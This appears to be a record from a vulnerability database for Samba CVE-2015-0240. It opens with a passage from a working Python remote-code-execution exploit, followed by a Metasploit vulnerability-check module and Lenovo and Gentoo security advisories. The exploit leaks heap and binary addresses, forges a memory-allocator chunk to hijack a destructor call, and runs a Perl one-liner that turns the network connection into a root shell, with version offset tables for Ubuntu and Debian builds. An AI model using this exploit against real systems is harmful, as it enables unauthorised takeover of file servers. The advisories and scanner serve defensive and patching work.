test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n\r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n\r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n\r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n\r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n\r\n########\r\n# start work\r\n########\r\n\r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n\r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n\r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n\r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n\r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n\r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n\r\n\r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n\r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n\r\n\r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36741/"}], "metasploit": [{"lastseen": "2019-11-13T17:25:10", "bulletinFamily": "exploit", "description": "This module checks if a Samba target is vulnerable to an uninitialized variable creds vulnerability.\n", "modified": "2019-03-05T09:38:51", "published": "2015-03-05T05:50:14", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_UNINIT_CRED", "href": "", "type": "metasploit", "title": "Samba _netr_ServerPasswordSet Uninitialized Credential State", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Aliases for common classes\n SIMPLE = Rex::Proto::SMB::SimpleClient\n XCEPT = Rex::Proto::SMB::Exceptions\n CONST = Rex::Proto::SMB::Constants\n\n RPC_NETLOGON_UUID = '12345678-1234-abcd-ef00-01234567cffb'\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Samba _netr_ServerPasswordSet Uninitialized Credential State',\n 'Description' => %q{\n This module checks if a Samba target is vulnerable to an uninitialized variable creds vulnerability.\n },\n 'Author' =>\n [\n 'Richard van Eeden', # Original discovery\n 'sleepya', # Public PoC for the explicit check\n 'sinn3r'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-0240'],\n ['OSVDB', '118637'],\n ['URL', 'https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/'],\n ['URL', 'https://gist.github.com/worawit/33cc5534cb555a0b710b'],\n ['URL', 'https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/']\n ],\n 'DefaultOptions' =>\n {\n 'SMBDirect' => true,\n 'SMBPass' => '',\n 'SMBUser' => '',\n 'SMBDomain' => '',\n 'DCERPC::fake_bind_multi' => false\n }\n ))\n\n # This is a good example of passive vs explicit check\n register_options([\n OptBool.new('PASSIVE', [false, 'Try banner checking instead of triggering the bug', false])\n ])\n\n # It's either 139 or 445. The user should not touch this.\n deregister_options('RPORT')\n end\n\n def rport\n @smb_port || datastore['RPORT']\n end\n\n\n # This method is more explicit, but a major downside is it's very slow.\n # So we leave the passive one as an option.\n # Please also see #maybe_vulnerable?\n def is_vulnerable?(ip)\n begin\n connect\n smb_login\n handle = dcerpc_handle(RPC_NETLOGON_UUID, '1.0','ncacn_np', [\"\\\\netlogon\"])\n dcerpc_bind(handle)\n rescue ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n elog(\"#{e.message}\\n#{e.backtrace * \"\\n\"}\")\n return false\n rescue Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::InvalidType,\n ::Rex::Proto::SMB::Exceptions::ReadPacket,\n ::Rex::Proto::SMB::Exceptions::InvalidCommand,\n ::Rex::Proto::SMB::Exceptions::InvalidWordCount,\n ::Rex::Proto::SMB::Exceptions::NoReply => e\n elog(\"#{e.message}\\n#{e.backtrace * \"\\n\"}\")\n return false\n rescue ::Exception => e\n elog(\"#{e.message}\\n#{e.backtrace * \"\\n\"}\")\n return false\n end\n\n # NetrServerPasswordSet request packet\n stub =\n [\n 0x00, # Server handle\n 0x01, # Max count\n 0x00, # Offset\n 0x01, # Actual count\n 0x00, # Account name\n 0x02, # Sec Chan Type\n 0x0e, # Max count\n 0x00, # Offset\n 0x0e # Actual count\n ].pack('VVVVvvVVV')\n\n stub << Rex::Text::to_unicode(ip) # Computer name\n stub << [0x00].pack('v') # Null byte terminator for the computer name\n stub << '12345678' # Credential\n stub << [0x0a].pack('V') # Timestamp\n stub << \"\\x00\" * 16 # Padding\n\n begin\n dcerpc.call(0x06, stub)\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n elog(\"#{e.message}\\n#{e.backtrace * \"\\n\"}\")\n rescue Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::InvalidType,\n ::Rex::Proto::SMB::Exceptions::ReadPacket,\n ::Rex::Proto::SMB::Exceptions::InvalidCommand,\n ::Rex::Proto::SMB::Exceptions::InvalidWordCount,\n ::Rex::Proto::SMB::Exceptions::NoReply => e\n elog(\"#{e.message}\\n#{e.backtrace * \"\\n\"}\")\n rescue ::Exception => e\n if e.to_s =~ /execution expired/i\n # So what happens here is that when you trigger the buggy code path, you hit this:\n # Program received signal SIGSEGV, Segmentation fault.\n # 0xb732ab3b in talloc_chunk_from_ptr (ptr=0xc) at ../lib/talloc/talloc.c:370\n # 370 if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {\n # In the Samba log, you'll see this as an \"internal error\" and there will be a \"panic action\".\n # And then Samba will basically not talk back to you at that point. In that case,\n # you will either lose the connection, or timeout, or whatever... depending on the SMB\n # API you're using. In our case (Metasploit), it's \"execution expired.\"\n # Samba (daemon) will stay alive, so it's all good.\n return true\n else\n raise e\n end\n end\n\n false\n ensure\n disconnect\n end\n\n\n # Returns the Samba version\n def get_samba_info\n res = ''\n begin\n res = smb_fingerprint\n rescue ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::Proto::SMB::Exceptions::ErrorCode\n return res\n rescue Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::InvalidType,\n ::Rex::Proto::SMB::Exceptions::ReadPacket,\n ::Rex::Proto::SMB::Exceptions::InvalidCommand,\n ::Rex::Proto::SMB::Exceptions::InvalidWordCount,\n ::Rex::Proto::SMB::Exceptions::NoReply\n return res\n rescue ::Exception => e\n if e.to_s =~ /execution expired/\n return res\n else\n raise e\n end\n ensure\n disconnect\n end\n\n res['native_lm'].to_s\n end\n\n\n # Converts a version string into an object so we can eval it\n def version(v)\n Gem::Version.new(v)\n end\n\n\n # Passive check for the uninitialized bug. The information is based on http://cve.mitre.org/\n def maybe_vulnerable?(samba_version)\n v = samba_version.scan(/Samba (\\d+\\.\\d+\\.\\d+)/).flatten[0] || ''\n return false if v.empty?\n found_version = version(v)\n\n if found_version >= version('3.5.0') && found_version <= version('3.5.9')\n return true\n elsif found_version >= version('3.6.0') && found_version < version('3.6.25')\n return true\n elsif found_version >= version('4.0.0') && found_version < version('4.0.25')\n return true\n elsif found_version >= version('4.1.0') && found_version < version('4.1.17')\n return true\n end\n\n false\n end\n\n\n # Check command\n def check_host(ip)\n samba_info = ''\n smb_ports = [445, 139]\n smb_ports.each do |port|\n @smb_port = port\n samba_info = get_samba_info\n vprint_status(\"Samba version: #{samba_info}\")\n\n if samba_info !~ /^samba/i\n vprint_status(\"Target isn't Samba, no check will run.\")\n return Exploit::CheckCode::Safe\n end\n\n if datastore['PASSIVE']\n if maybe_vulnerable?(samba_info)\n flag_vuln_host(ip, samba_info)\n return Exploit::CheckCode::Appears\n end\n else\n # Explicit: Actually triggers the bug\n if is_vulnerable?(ip)\n flag_vuln_host(ip, samba_info)\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n\n return Exploit::CheckCode::Detected if samba_info =~ /^samba/i\n\n Exploit::CheckCode::Safe\n end\n\n\n # Reports to the database about a possible vulnerable host\n def flag_vuln_host(ip, samba_version)\n report_vuln(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :name => self.name,\n :info => samba_version,\n :refs => self.references\n )\n end\n\n\n def run_host(ip)\n peer = \"#{ip}:#{rport}\"\n case check_host(ip)\n when Exploit::CheckCode::Vulnerable\n print_good(\"The target is vulnerable to CVE-2015-0240.\")\n when Exploit::CheckCode::Appears\n print_good(\"The target appears to be vulnerable to CVE-2015-0240.\")\n when Exploit::CheckCode::Detected\n print_status(\"The target appears to be running Samba.\")\n else\n print_status(\"The target appears to be safe\")\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_uninit_cred.rb"}], "lenovo": [{"lastseen": "2018-02-21T17:01:59", "bulletinFamily": "info", "description": "**Lenovo Security Advisory:** LEN-2015-016 \n**Potential Impact:** Execution of arbitrary code \n****Severity****: High \n \n**Summary:** Samba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information. An uninitialized pointer use flaw was found in the Samba daemon (smbd). A malicious Samba client could send specially crafted netlogon packets that could potentially lead to arbitrary code execution with the privileges of the user running smbd. \n \nSamba is utilized by Lifeline firmware which ships on LenovoEMC network storage devices. Refer to Product Impact for information about remediation. \n \n**Product Impact:**\n\n**Affected Product ** | **Lifeline minimum version including fix** | **Link ** \n---|---|--- \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC EZ Media & Backup (hm3)\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC ix2 (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/31178> \n \nLenovoEMC ix4-300d (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px2-300d (inc NVR)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px4-300d (inc NVR)\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27363> \n \nLenovoEMC px4-300r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27368> \n \nLenovoEMC px4-400d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400d NVR\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33824> \n \nLenovoEMC px6-300d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27366> \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC px12-450r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC ix12-300r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC px12-350r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC Home Media Cloud Edition (hm2)\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix2-200 Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix4-200d Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \n \n**Acknowledgements: **None \n**Other information and references:**\n\n * <https://www.us-cert.gov/ncas/current-activity/2015/02/24/Samba-Remote-Code-Execution-Vulnerability>\n * CVE ID: [CVE-2015-0240](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>)\n**Revision History:**\n\n****Revision****\n\n| \n\n****Date****\n\n| \n\n****Description**** \n \n---|---|--- \n** 1.1** | ** 6 Jun 2015** | ** Published additional fixes** \n** 1.0** | ** 3 Apr 2015** | ** Initial release**\n", "modified": "2017-01-23T00:00:00", "published": "2017-01-23T00:00:00", "id": "LENOVO:PS500014-NOSID", "href": "https://support.lenovo.com/us/en/product_security/samba_remote_vuln", "type": "lenovo", "title": "Samba Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "description": "### Background\n\nSamba is a suite of SMB and CIFS client/server programs.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Samba. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, bypass intended file restrictions, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Samba users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-fs/samba-3.6.25\"", "modified": "2015-02-25T00:00:00", "published": "2015-02-25T00:00:00", "id": "GLSA-201502-15", "href": "https://security.gentoo.org/glsa/201502-15", "type": "gentoo", "title": "Samba: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}